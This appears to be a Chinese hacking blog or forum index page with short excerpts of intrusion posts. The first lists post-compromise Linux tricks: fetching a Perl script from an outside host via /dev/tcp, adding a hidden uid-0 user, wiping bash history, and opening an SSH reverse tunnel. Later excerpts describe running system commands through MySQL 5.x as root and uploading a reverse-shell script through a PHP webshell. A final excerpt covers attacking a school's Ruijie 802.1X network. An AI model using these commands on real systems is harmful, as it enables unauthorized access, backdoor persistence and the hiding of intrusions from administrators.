自己不会找EXP,在黑帽一位朋友给的,这里谢谢了。
搞个图纪念下吧!
1.无wget nc等下载工具时下载文件
exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat< &5 > c.pl
2.Linux添加uid为0的用户
useradd -o -u 0 cnbird
3.bash去掉history记录
export HISTSIZE=0
export HISTFILE=/dev/null
4.SSH反向链接
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指定远端服务器SSH端口
然后服务器上执行ssh localhost -p 44即可
5.weblogic本地读取文件漏洞 More
mysql5.x for linux下面有一个函数,可以帮助我们干很多事情,这个函数4。x下面貌似没,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的明天再看看函数手册,再装一个实验一下。
mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的范围内。
一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如此这般。今天我们换一种方式。
More
作者wjs
qq 825680101
我也是刚接触linux,谢谢师傅sunwear的指导。
先在网站目录上传1.pl,是个反弹脚本
Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0
More
可惜偶的学校漏洞补了
http://www.t00ls.net/thread-6316-1-1.html
首先,知己自彼,百战不已.我的文笔不好,大家自己看图说话,再加自己的幻想:
一般学校的锐捷模式都是如下:
802.1X实施方案采用了锐捷SAM计费管理系统,系统分为如下三个方面。
1. 认证服务器:RADIUS认证服务器 + SQL用户数据库 + jboss管理服务器;
2. RADIUS接入设备RAS:接入交换机(S2126G/S2150G),端口启用802.1X认证;
3. 客户端软件:用户需安装锐捷SAM客户端软件,通过802.1X认证后方可访问校园网。 More
